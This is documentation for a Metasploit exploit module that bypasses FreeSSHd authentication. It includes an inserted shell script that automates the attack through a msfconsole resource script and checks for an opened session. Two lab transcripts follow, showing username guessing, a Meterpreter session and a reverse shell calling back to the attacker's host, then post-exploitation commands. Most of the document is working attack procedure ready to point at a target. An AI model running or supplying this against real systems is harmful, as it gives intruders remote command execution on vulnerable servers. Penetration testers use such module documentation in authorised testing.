
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/ssh/freesshd_authbypass.md

Description

This module exploits an authentication bypass vulnerability in FreeSSHd versions 1.2.6 and earlier. The only thing required is a valid username (root by default). The exploit has been tested against both password and public key authentication.

Verification

  1. Start msfconsole

  2. Do : use exploit/windows/ssh/freesshd_authbypass

  3. Do : set RHOST [target IP]

  4. Do : set PAYLOAD [valid windows payload] if you want to use other payloads (windows/meterpreter/reverse_tcp by default)

  5. Do : set LHOST [Your IP]

  6. Do : set LPORT [valid port] (port is 4444 by default)

  7. Do : exploit

  8. If the target is vulnerable, a session (Meterpreter by default) should open
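The steps above can be driven non-interactively. The script below is an added example, not part of the module or its documentation: it writes the same commands into a msfconsole resource script, runs it, and decides pass/fail from the "session N opened" line that msfconsole prints (the line format is taken from the transcripts further down). It assumes msfconsole is on PATH; the RHOST and LHOST values are placeholders taken from the transcripts, and the script only contacts a target when invoked with the `run` argument.

```shell
#!/bin/sh
# Added example, not part of the freesshd_authbypass module or its docs:
# automate the verification steps with a msfconsole resource script and
# report whether a session was opened.
# Assumptions: msfconsole is on PATH; RHOST/LHOST below are placeholders.
set -eu

RHOST="${RHOST:-192.168.80.131}"    # target running FreeSSHd (placeholder)
LHOST="${LHOST:-192.168.80.138}"    # address the reverse payload calls back to (placeholder)
LPORT="${LPORT:-4444}"
PAYLOAD="${PAYLOAD:-windows/meterpreter/reverse_tcp}"

# Write the same commands the manual walkthrough types into msfconsole.
# 'exploit -z' backgrounds the session instead of interacting with it;
# 'exit -y' closes any sessions and quits so the script can finish.
write_rc() {
  cat > "$1" <<EOF
use exploit/windows/ssh/freesshd_authbypass
set RHOST $RHOST
set PAYLOAD $PAYLOAD
set LHOST $LHOST
set LPORT $LPORT
exploit -z
sessions -l
exit -y
EOF
}

# Print the id of the first session msfconsole reports as opened, or nothing.
# Matches both "Meterpreter session 2 opened (...)" and
# "Command shell session 1 opened (...)".
session_id() {
  sed -n 's/^.* session \([0-9][0-9]*\) opened .*/\1/p' "$1" | head -n 1
}

# Run the check end to end: returns 0 if a session opened, 1 otherwise.
run_check() {
  rc=$(mktemp) && log=$(mktemp)
  write_rc "$rc"
  msfconsole -q -r "$rc" 2>&1 | tee "$log"
  sid=$(session_id "$log")
  rm -f "$rc"
  if [ -n "$sid" ]; then
    echo "VULNERABLE: $RHOST gave session $sid"
    return 0
  fi
  echo "no session opened against $RHOST (not vulnerable, wrong username list, or callback blocked)"
  return 1
}

# Only contact the target when invoked as: sh freesshd_check.sh run
if [ "${1:-}" = "run" ]; then
  run_check
fi
```

A non-zero exit from `run_check` does not by itself prove the host is patched: the reverse payload must also be able to reach LHOST:LPORT, so check the listener and any egress filtering before concluding anything from a failed run.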

Example with default payload (windows/meterpreter/reverse_tcp)

```
msf > use exploit/windows/ssh/freesshd_authbypass
msf exploit(windows/ssh/freesshd_authbypass) > set RHOST 192.168.80.131
RHOST => 192.168.80.131
msf exploit(windows/ssh/freesshd_authbypass) > set LHOST 192.168.80.138
LHOST => 192.168.80.138
msf exploit(windows/ssh/freesshd_authbypass) > exploit

[*] Started reverse TCP handler on 192.168.80.138:4444
[*] 192.168.80.131:22 - Trying username '4Dgifts'
[*] 192.168.80.131:22 - Trying username 'EZsetup'
[*] 192.168.80.131:22 - Trying username 'OutOfBox'
[*] 192.168.80.131:22 - Trying username 'ROOT'
[*] Sending stage (179779 bytes) to 192.168.80.131
[*] Meterpreter session 2 opened (192.168.80.138:4444 -> 192.168.80.131:49166) at 2018-11-16 16:10:33 +0800

meterpreter > sysinfo
Computer        : SSH-TEST-SERVER
OS              : Windows 8.1 (Build 9600).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter >
```

Example with plain old reverse shell (windows/shell_reverse_tcp)

```
msf > use exploit/windows/ssh/freesshd_authbypass
msf exploit(windows/ssh/freesshd_authbypass) > set RHOST 192.168.80.131
RHOST => 192.168.80.131
msf exploit(windows/ssh/freesshd_authbypass) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(windows/ssh/freesshd_authbypass) > set LHOST 192.168.80.138
LHOST => 192.168.80.138
msf exploit(windows/ssh/freesshd_authbypass) > set LPORT 4444
LPORT => 4444
msf exploit(windows/ssh/freesshd_authbypass) > exploit

[*] Started reverse TCP handler on 192.168.80.138:4444
[*] 192.168.80.131:22 - Trying username '4Dgifts'
[*] 192.168.80.131:22 - Trying username 'EZsetup'
[*] 192.168.80.131:22 - Trying username 'OutOfBox'
[*] 192.168.80.131:22 - Trying username 'ROOT'
[*] Command shell session 1 opened (192.168.80.138:4444 -> 192.168.80.131:49167) at 2018-11-16 16:12:19 +0800

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : localdomain
   Link-local IPv6 Address . . . . . : fe80::5d22:f345:9ea1:a320%3
   IPv4 Address. . . . . . . . . . . : 192.168.80.131
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :

Tunnel adapter isatap.localdomain:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : localdomain

C:\Windows\system32>hostname
hostname
SSH-TEST-SERVER

C:\Windows\system32>
```